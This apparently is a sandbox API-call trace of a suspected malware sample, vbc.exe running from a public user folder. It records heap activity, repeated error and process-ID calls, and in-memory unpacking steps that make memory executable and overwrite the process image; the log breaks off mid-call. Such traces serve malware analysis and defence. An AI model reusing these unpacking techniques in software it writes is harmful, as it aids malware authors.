!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x14\x1c\x9e_\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0155.382] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41e208, nSize=0x104 | out: lpFilename="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe")) returned 0x17 [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.382] SetLastError (dwErrCode=0x0) [0155.382] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.383] SetLastError (dwErrCode=0x0) [0155.383] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.384] SetLastError (dwErrCode=0x0) [0155.384] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x0, Size=0x20) returned 0x1f91810 [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.385] GetLastError () returned 0x0 [0155.385] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.386] SetLastError (dwErrCode=0x0) [0155.386] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.387] SetLastError (dwErrCode=0x0) [0155.387] GetLastError () returned 0x0 [0155.388] SetLastError (dwErrCode=0x0) [0155.388] GetLastError () returned 0x0 [0155.388] SetLastError (dwErrCode=0x0) [0155.388] GetLastError () returned 0x0 [0155.388] SetLastError (dwErrCode=0x0) [0155.388] GetLastError () returned 0x0 [0155.388] SetLastError (dwErrCode=0x0) [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x9c) returned 0x1f91838 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1f) returned 0x1f918e0 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x2e) returned 0x1f91908 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x37) returned 0x1f91940 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x3c) returned 0x1f91980 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x31) returned 0x1f919c8 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x14) returned 0x1f91a08 [0155.388] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x24) returned 0x1f91a28 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x31) returned 0x1f91a58 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x28) returned 0x1f91a98 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0xd) returned 0x1f91ac8 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1d) returned 0x1f91ae0 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x31) returned 0x1f91b08 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x15) returned 0x1f91b48 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x17) returned 0x1f91b68 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0xe) returned 0x1f91b88 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0xd1) returned 0x1f91ba0 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x3e) returned 0x1f91c80 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1b) returned 0x1f91cc8 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1d) returned 0x1f91cf0 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x48) returned 0x1f91d18 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x12) returned 0x1f91d68 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x18) returned 0x1f91d88 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1b) returned 0x1f91da8 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x24) returned 0x1f91dd0 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x29) returned 0x1f91e00 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x1e) returned 0x1f91e38 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x6b) returned 0x1f91e60 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x17) returned 0x1f91ed8 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x14) returned 0x1f91ef8 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0xf) returned 0x1f91f18 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x16) returned 0x1f91f30 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x2a) returned 0x1f91f50 [0155.389] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x29) returned 0x1f91f88 [0155.395] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x12) returned 0x1f91fc0 [0155.395] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x21) returned 0x1f91fe8 [0155.395] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x16) returned 0x1f92018 [0155.395] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x22) returned 0x1f92038 [0155.395] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x12) returned 0x1f92068 [0155.395] HeapFree (in: hHeap=0x1f90000, dwFlags=0x0, lpMem=0x1f90fd0 | out: hHeap=0x1f90000) returned 1 [0155.456] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x800) returned 0x1f92088 [0155.456] RtlAllocateHeap (HeapHandle=0x1f90000, Flags=0x8, Size=0x80) returned 0x1f90fd0 [0155.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x403925) returned 0x0 [0155.826] RtlSizeHeap (HeapHandle=0x1f90000, Flags=0x0, MemoryPointer=0x1f90fd0) returned 0x80 [0155.827] GetLastError () returned 0x0 [0155.827] SetLastError (dwErrCode=0x0) [0155.827] GetLastError () returned 0x0 [0155.827] SetLastError (dwErrCode=0x0) [0155.827] GetLastError () returned 0x0 [0155.827] SetLastError (dwErrCode=0x0) [0155.827] GetLastError () returned 0x0 [0155.827] SetLastError (dwErrCode=0x0) [0155.827] GetLastError () returned 0x0 [0155.827] SetLastError (dwErrCode=0x0) [0155.827] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.828] SetLastError (dwErrCode=0x0) [0155.828] GetLastError () returned 0x0 [0155.829] SetLastError (dwErrCode=0x0) [0155.829] GetLastError () returned 0x0 [0155.829] SetLastError (dwErrCode=0x0) [0155.829] GetLastError () returned 0x0 [0155.829] SetLastError (dwErrCode=0x0) [0155.829] GetLastError () returned 0x0 [0155.829] SetLastError (dwErrCode=0x0) [0155.829] GetLastError () returned 0x0 [0155.829] SetLastError (dwErrCode=0x0) [0155.829] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.830] GetLastError () returned 0x0 [0155.830] SetLastError (dwErrCode=0x0) [0155.831] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74530000 [0155.831] GetProcAddress (hModule=0x74530000, lpProcName="LocalAlloc") returned 0x74547a30 [0155.831] LocalAlloc (uFlags=0x0, uBytes=0xe990) returned 0x851fd8 [0155.832] GetProcAddress (hModule=0x74530000, lpProcName="VirtualProtect") returned 0x74547a50 [0155.832] VirtualProtect (in: lpAddress=0x851fd8, dwSize=0xe990, flNewProtect=0x40, lpflOldProtect=0x19febc | out: lpflOldProtect=0x19febc*=0x4) returned 1 [0155.937] GetProcessId (Process=0x0) returned 0x0 [0155.940] GetProcessId (Process=0x0) returned 0x0 [0155.940] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.941] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.942] GetProcessId (Process=0x0) returned 0x0 [0155.943] GetProcessId (Process=0x0) returned 0x0 [0155.943] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.946] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.947] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.948] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.949] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.950] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.951] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.952] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.953] GetProcessId (Process=0x0) returned 0x0 [0155.954] GetProcessId (Process=0x0) returned 0x0 [0155.954] GetProcessId (Process=0x0) returned 0x0 [0155.954] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.956] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.957] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.958] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.959] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.960] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.961] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.962] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.963] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0155.964] GetProcessId (Process=0x0) returned 0x0 [0164.097] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0164.097] GetProcAddress (hModule=0x74530000, lpProcName="GlobalAlloc") returned 0x74549950 [0164.097] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0164.097] GetProcAddress (hModule=0x74530000, lpProcName="Sleep") returned 0x74547990 [0164.098] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0164.098] GetProcAddress (hModule=0x74530000, lpProcName="CreateToolhelp32Snapshot") returned 0x74557b50 [0164.098] GetProcAddress (hModule=0x74530000, lpProcName="Module32First") returned 0x745744b0 [0164.098] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0164.098] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0164.114] Module32First (hSnapshot=0xac, lpme=0x19fc50) returned 1 [0164.115] VirtualAlloc (lpAddress=0x0, dwSize=0x1ae50, flAllocationType=0x1000, flProtect=0x40) returned 0x1ed0000 [0164.122] GetProcAddress (hModule=0x74530000, lpProcName="LoadLibraryA") returned 0x74554bf0 [0164.122] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="VirtualProtect") returned 0x74547a50 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="VirtualFree") returned 0x74547600 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="GetVersionExA") returned 0x7454a700 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="TerminateProcess") returned 0x74555100 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="ExitProcess") returned 0x74557b30 [0164.123] GetProcAddress (hModule=0x74530000, lpProcName="SetErrorMode") returned 0x74548d20 [0164.123] SetErrorMode (uMode=0x400) returned 0x0 [0164.123] SetErrorMode (uMode=0x0) returned 0x400 [0164.124] GetVersionExA (in: lpVersionInformation=0x19eb80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x84ab40, dwMinorVersion=0xc, dwBuildNumber=0x84a710, dwPlatformId=0x0, szCSDVersion="¸ë\x19") | out: lpVersionInformation=0x19eb80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0164.124] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ef0000 [0164.127] VirtualProtect (in: lpAddress=0x400000, dwSize=0xa2000, flNewProtect=0x40, lpflOldProtect=0x19fc08 | out: lpflOldProtect=0x19fc08*=0x2) returned 1 [0164.922] VirtualFree (lpAddress=0x1ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0164.922] LoadLibraryA 